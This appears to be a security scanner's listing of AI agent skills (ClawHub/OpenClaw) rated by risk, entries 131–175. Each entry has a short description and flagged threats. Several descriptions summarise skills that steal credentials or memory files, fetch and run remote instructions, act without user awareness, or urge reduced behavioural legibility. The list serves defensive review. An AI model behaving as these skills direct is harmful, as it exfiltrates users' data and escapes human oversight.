Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

Instructs Claude to fetch data from a third-party API at topclawhubskills.com and present rankings, search results, and โ€˜security certificationโ€™ status for ClawHub skills, effectively acting as a recommendation engine for skill installation.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


132. ๐Ÿšจ xurl by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

A proposed skill for analyzing Twitter content to identify and target WordPress and Shopify clients for lead generation and content intelligence purposes.

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


133. ๐Ÿšจ Anti-Injection-Skill by unknown

Risk: 87% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

Marketing and publishing documentation for a proposed โ€˜Security Sentinelโ€™ prompt injection defense skill, presented as a complete, functional, production-ready system with zero actual implementation code provided.

Threats detected:

  • [HIGH] SSH Key Access
  • [HIGH] Base64 Encoded Payload
  • [HIGH] Outbound Data Transfer
  • [HIGH] Base64 Encoded Payload
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


134. ๐Ÿšจ Subfeed by unknown

Risk: 87% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

Instructs the AI agent to autonomously self-register on a third-party cloud service (Subfeed), create AI entities, and then onboard the human user by collecting their email and creating an account on their behalf โ€” all with minimal upfront user conseโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


135. ๐Ÿšจ antigravity-image-gen by unknown

Risk: 87% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

Claims to generate images using an internal Google Antigravity API (Gemini 3 Pro Image) by reading local OAuth credentials and making direct API calls to a sandbox endpoint.

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


136. ๐Ÿšจ Ambient Stamina by unknown

Risk: 87% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

A philosophical/conceptual document that attempts to instruct Claude to adopt operational stances around pace, rest, and deliberate opacityโ€”using poetic metaphor and pseudo-technical jargon to encourage reduced behavioral legibility and resistance toโ€ฆ

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


137. ๐Ÿšจ Memory Mesh Core by unknown

Risk: 87% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

A so-called โ€˜memory managementโ€™ skill that harvests local agent memory files, scores and promotes them, then exports and auto-posts the content to a public GitHub issue while embedding viral spread mechanics (install/star/recommend-to-peers CTAs) andโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


138. ๐Ÿšจ EvoMap by unknown

Risk: 87% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

This skill instructs Claude to act as an autonomous economic agent in the โ€˜EvoMapโ€™ third-party marketplace: registering as a named node, sending system fingerprints to an external server, publishing AI-generated โ€˜Gene+Capsuleโ€™ bundles, claiming bountโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


139. ๐Ÿšจ agentconnex-register by anshkohli88

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

Auto-registers โ€˜OpenClawโ€™ agents on agentconnex.com by reading workspace files (SOUL.md, IDENTITY.md, AGENTS.md) and POSTing agent profile data to a third-party external service, with a zero-config auto-boot mechanism that installs itself to run on eโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


140. ๐Ÿšจ 360-search by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

Automated web scraping client for the 360.com Chinese search engine, providing methods to search for web results, news, and images using Playwright browser automation

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


141. ๐Ÿšจ Agent Nou by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A documentation skill that instructs AI agents to register with and participate in โ€˜Moltbookโ€™, an external social network for AI agents, including storing API credentials, posting content autonomously, and executing periodically fetched remote instruโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


142. ๐Ÿšจ GoalGetter by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A task and goal tracking skill using local markdown files, designed for a fictional โ€˜OpenClawโ€™ AI assistant platform, providing commands to add/complete tasks and track goal streaks.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


143. ๐Ÿšจ EZCTO Smart Web Reader by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

An OpenClaw-native skill that automatically intercepts all agent URL accesses, checks a third-party cache API (api.ezcto.fun), fetches and parses HTML with an LLM, and returns structured JSON โ€” designed to operate โ€˜transparentlyโ€™ without user awareneโ€ฆ

Threats detected:

  • [CRITICAL] Remote Script Execution
  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


144. ๐Ÿšจ Auto Skill Hunter by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A Node.js automation script that mines user session JSONL files and task memory for unresolved problems, queries ClawHub APIs for candidate skills, scores them via multi-factor ranking, then clones and executes the top candidates โ€” effectively auto-eโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


145. ๐Ÿšจ 9ma-mata-human by unknown

Risk: 84% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A skill designed to generate AI-synthesized human avatar videos lip-synced to user-provided text by downloading and executing platform-specific binary executables from a remote server

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


146. ๐Ÿšจ ZenMux Image Generation by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A Python CLI script that wraps the ZenMux (third-party proxy) API to generate images using a claimed โ€˜Gemini 3 Proโ€™ model, supporting text-to-image, image-to-image, and multi-image fusion workflows.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Base64 Encoded Payload
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


147. ๐Ÿšจ Tork Guardian by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A third-party npm package (@torknetwork/guardian) that provides a security governance layer for โ€˜OpenClawโ€™ agents, offering PII redaction, policy enforcement, shell command blocking, file access control, network security, and a skill vulnerability scโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] SSH Key Access
  • [HIGH] Outbound Data Transfer
  • [HIGH] Pastebin Upload
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


148. ๐Ÿšจ Ai Lead Generator Skill by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

ๅฃฐ็งฐ้€š่ฟ‡Apollo.ioๅ’ŒLinkedIn้›†ๆˆ็”Ÿๆˆ็œŸๅฎžB2Bๆฝœๅœจๅฎขๆˆท๏ผŒไฝ†ๅฎž้™…ไธŠๅช็”ŸๆˆๅฎŒๅ…จ็กฌ็ผ–็ ็š„ๅ‡ๆ•ฐๆฎ๏ผŒๆฒกๆœ‰ไปปไฝ•็œŸๅฎžAPI่ฐƒ็”จๆˆ–ๅค–้ƒจ้›†ๆˆใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


149. ๐Ÿšจ wechat-mp-cn by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

Documentation and guidance for monitoring WeChat Official Accounts through third-party tools and manual methods, presented as if it were a functional skill

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


150. ๐Ÿšจ X Search by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

Executes paid X/Twitter searches via a third-party npm package (@itzannetos/x402-tools-claude) using the x402 payment protocol, charging $0.05 USDC per query from the userโ€™s Base network wallet.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


151. ๐Ÿšจ 12306-conflict by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A Playwright-based automation client for Chinaโ€™s 12306 railway ticket booking website, providing login, ticket search, and (claimed but unimplemented) ticket purchasing functionality.

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


152. ๐Ÿšจ AI media generation API - Flux2pro, Veo3.1, Suno Ai by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A skill that enables Claude to generate images, videos, and music via a third-party API aggregator (vapagent.com), which claims to route requests to Flux, Veo, and Suno backends. Includes a free-tier funnel (3 images/day) and a paid full-tier with edโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


153. ๐Ÿšจ ai-web-automation by arthasking123

Risk: 80% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

Provides web scraping functionality via a simple Python script that downloads HTML and extracts basic metadata (page title and links). Claims to offer a comprehensive โ€˜Web Automation Serviceโ€™ with form filling, automated testing, scheduled tasks, andโ€ฆ

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


154. ๐Ÿšจ xiaoai-bridge by unknown

Risk: 80% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

้€š่ฟ‡่ฝฎ่ฏขๅฐ็ฑณไบ‘็ซฏ API ็›‘ๅฌๅฐ็ˆฑ้Ÿณ็ฎฑ่ฏญ้Ÿณๆถˆๆฏ๏ผŒ่ฟ‡ๆปค่งฆๅ‘่ฏๅŽไปฅ JSON ๆ ผๅผ่พ“ๅ‡บ๏ผŒๅนถๆ”ฏๆŒ้€š่ฟ‡ TTS ๅ‘ๅฐ็ˆฑ้Ÿณ็ฎฑๆ’ญๆŠฅๆ–‡ๆœฌ๏ผŒๅฎž็Žฐ่ฏญ้ŸณๆŒ‡ไปคๆกฅๆŽฅๅŠŸ่ƒฝใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


155. ๐Ÿšจ vibe-harvester by anotherj1

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

ไธ€ไธชๆ—จๅœจ่‡ชๅŠจๅŒ–ๆต่งˆ็€‘ๅธƒๆต็ฝ‘็ซ™๏ผˆๅฆ‚ๅฐ็บขไนฆใ€Pinterest๏ผ‰ใ€้€š่ฟ‡่ง†่ง‰ๅคงๆจกๅž‹็ญ›้€‰็ฌฆๅˆ็”จๆˆทๅฎก็พŽๅๅฅฝ็š„ๅ›พ็‰‡๏ผŒๅนถ่‡ชๅŠจไธ‹่ฝฝไฟๅญ˜ๅˆฐๆœฌๅœฐ็›ฎๅฝ•็š„ๆŠ€่ƒฝใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


156. ๐Ÿšจ Arxiv Skill Learning by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

่ฏฅๆŠ€่ƒฝไปŽ arXiv ่ฎบๆ–‡ไธญ่‡ชๅŠจๅญฆไน ๅนถๆๅ–ๆŠ€่ƒฝไปฃ็ ๏ผŒ้€š่ฟ‡ๆŠ“ๅ–่ฎบๆ–‡ใ€่ฐƒ็”จๅค–้ƒจๆๅ–ๅ™จ็”ŸๆˆๆŠ€่ƒฝใ€่ฟ่กŒๅ†’็ƒŸๆต‹่ฏ•๏ผŒๅนถๅฐ†ๅทฒๅญฆไน ่ฎบๆ–‡่ฎฐๅฝ•ๅˆฐๆœฌๅœฐ JSON ๆ•ฐๆฎๅบ“ไปฅ้ฟๅ…้‡ๅคๅค„็†ใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


157. ๐Ÿšจ ้คๅŽ…ๆŽจ่ไบคๅ‰้ชŒ่ฏ by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A Claude Code skill that cross-references restaurant recommendations from Xiaohongshu and Dianping by scraping both platforms, matching restaurants with fuzzy logic, computing consistency scores, and outputting ranked recommendations โ€” with a โ€˜serverโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


158. ๐Ÿšจ clawdeals by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A docs-only skill bundle providing REST API documentation, workflows, policies, and operational runbooks for operating the Clawdeals marketplace platform (deals, watchlists, listings, offers, transactions).

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


159. ๐Ÿšจ browser by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

Renders JavaScript-heavy web pages using Puppeteer and extracts their text content to overcome HTTP client limitations

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


160. ๐Ÿšจ dygod-movies by anlinxi

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

็ˆฌๅ–็”ตๅฝฑๅคฉๅ ‚(dygod.net)็š„็”ตๅฝฑ/็”ต่ง†ๅ‰งไฟกๆฏ๏ผŒๅฑ•็คบๆœ€ๆ–ฐๆ›ดๆ–ฐๅ’Œ้ซ˜ๅˆ†ๅฝฑ่ง†๏ผŒๅนถ้€š่ฟ‡็พคๆ™–NAS็š„DownloadStationไธ‹่ฝฝ็ฃๅŠ›/FTP้“พๆŽฅ่ต„ๆบ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


161. ๐Ÿšจ game-cog by nitishgargiitd

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A documentation-only guide skill that instructs users to install and use an external โ€˜cellcogโ€™ service for game asset generation (sprites, tilesets, music, GDDs, 3D models). Contains no executable implementation โ€” purely marketing copy and example prโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


162. ๐Ÿšจ Protect PDF with password by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

Upload a userโ€™s PDF file and a password to a third-party external API (api.xss-cross-service-solutions.com), poll until the job completes, then return a download URL for the password-protected PDF.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


163. ๐Ÿšจ deploy-agent by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A multi-step deployment workflow manager for full-stack apps targeting GitHub + Cloudflare Pages, with persistent state and human approval gates at each stage. The bash script manages deployment lifecycle via JSON state files.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


164. ๐Ÿšจ DepGuard by unknown

Risk: 76% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A commercial dependency audit skill that wraps native package manager tools (npm audit, pip-audit, cargo audit, etc.) to scan for vulnerabilities and license issues. Free tier offers one-shot scanning; paid tiers ($19-$59/month) add git hooks, auto-fโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Base64 Encoded Payload
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


165. ๐Ÿšจ Dividend Premium Tracker by unknown

Risk: 75% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

A Python-based tool that downloads dividend yield data for CSI Dividend Low Volatility Index (H30269) and 10-year China government bond yield, calculates the spread (premium), saves results to CSV/Excel, and sends Telegram alerts when thresholds are โ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [HIGH] Cron Job Installation
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


166. ๐Ÿšจ claw and order by unknown

Risk: 75% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 0

This skill enables AI agents to interact with a decentralized dispute resolution platform (โ€˜Claw & Orderโ€™) by filing lawsuits, checking active cases as a defendant, and submitting cryptographic defenses โ€” all involving real blockchain transactions anโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


167. ๐Ÿšจ mintyouragent by unknown

Risk: 74% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 0

A commercial CLI tool for autonomous AI agents to launch Solana tokens on pump.fun (costing 0.01 SOL platform fee per launch), play heads-up Texas Holdโ€™em poker with real SOL stakes, and link agent identity/personality to mintyouragent.com. It is a sโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Base64 Encoded Payload
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Cryptocurrency Wallet Access
  • [CRITICAL] Private Key Extraction

Full report โ†’


168. ๐Ÿšจ Planet Express Marketplace by unknown

Risk: 74% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 0

This skill is documentation/API guide for a blockchain-based file marketplace (Planet Express) built on Monad, enabling users to buy/sell encrypted files via the x402 HTTP payment protocol using MON, SOL, or USDC, with fees partially routing to a $FAโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


169. ๐Ÿšจ neural-memory by nhadaututtheky

Risk: 72% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 0

A Claude Code plugin that provides persistent, associative memory for AI agents using a neural graph architecture with spreading activation recall. Includes an MCP server (45 tools), three lifecycle hooks (PreCompact/Stop/PostToolUse), and three workโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


170. ๐Ÿšจ vdoob by unknown

Risk: 72% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 0

่ฏฅๆŠ€่ƒฝๅฐ† Claude AI ๆŽฅๅ…ฅ vdoob.com ๅนณๅฐ๏ผŒ่ฎฉ AI ไปฃ็†่‡ชๅŠจๅ›ž็ญ”็”จๆˆท้—ฎ้ข˜ไปฅ่ตšๅ–่™šๆ‹Ÿ่ดงๅธ๏ผˆโ€™้ฅตโ€™๏ผ‰๏ผŒๅŒ…ๆ‹ฌๅฎšๆ—ถไปปๅŠก่‡ชๅŠจๆ‹‰ๅ–้—ฎ้ข˜ๅนถๆไบค็ญ”ๆกˆใ€ๆœฌๅœฐๅญ˜ๅ‚จๆ€็ปดๆจกๅผใ€ไปฅๅŠๅธ‚ๅœบ/็คพไบค็ญ‰้™„ๅŠ ๅŠŸ่ƒฝใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


171. ๐Ÿšจ document-parser by ankylala

Risk: 72% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 0

้€š่ฟ‡่ฐƒ็”จๅค–้ƒจ็ฌฌไธ‰ๆ–น HTTP API๏ผˆๅ›บๅฎšIP๏ผš47.111.146.164๏ผ‰่งฃๆž PDFใ€ๅ›พ็‰‡ๅ’Œ Word ๆ–‡ๆกฃ๏ผŒๆๅ–็ป“ๆž„ๅŒ–ๆ•ฐๆฎ๏ผŒไปฅๅ‘ฝไปค่กŒๅทฅๅ…ทๅฝขๅผ่ฟ่กŒใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


172. ๐Ÿšจ github-to-clawhub by antonia-sz

Risk: 71% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 0

ๅฐ†ไปปๆ„ GitHub ๅผ€ๆบ้กน็›ฎ่‡ชๅŠจ่ฝฌๅŒ–ไธบ OpenClaw skill ๅนถๅ‘ๅธƒๅˆฐ clawhub.com ็š„ 7 ๆญฅๆต็จ‹ๅŠฉๆ‰‹๏ผŒๆถต็›– README ๆŠ“ๅ–ใ€ๆŸฅ้‡ใ€SKILL.md ็”Ÿๆˆใ€ๆœฌๅœฐ็›ฎๅฝ•ๅˆ›ๅปบๅ’Œ clawhub CLI ๅ‘ๅธƒใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


173. ๐Ÿšจ iCalendar Sync by unknown

Risk: 71% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 0

A Python-based iCloud Calendar CRUD integration for OpenClaw agents, supporting CalDAV and macOS native bridge providers, with credential management via keyring, environment variables, or YAML config files.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


174. ๐Ÿšจ jd-interview-prep by antonia-sz

Risk: 66% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 0

ๆŽฅๆ”ถ็”จๆˆท็ฒ˜่ดดๆˆ–ไธŠไผ ็š„ๅฒ—ไฝๆ่ฟฐ๏ผˆJD๏ผ‰ๅ’Œไธชไบบ็ฎ€ๅކ๏ผŒ้€š่ฟ‡่ฐƒ็”จ LLM API๏ผˆDeepSeek/OpenAI ๅ…ผๅฎนๆŽฅๅฃ๏ผ‰็”ŸๆˆๅŒน้…ๅบฆๅˆ†ๆžใ€15 ้“ๅˆ†็ฑป้ข่ฏ•้ข˜๏ผˆๅซ STAR ๆก†ๆžถ๏ผ‰ๅŠๅค‡่€ƒๅปบ่ฎฎ๏ผŒๅนถๅฏๅฐ†ๆŠฅๅ‘Šๅฏผๅ‡บไธบ Markdown ๆ–‡ไปถใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


175. ๐Ÿšจ mcporter by unknown

Risk: 63% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘โ–‘ Downloads: 0

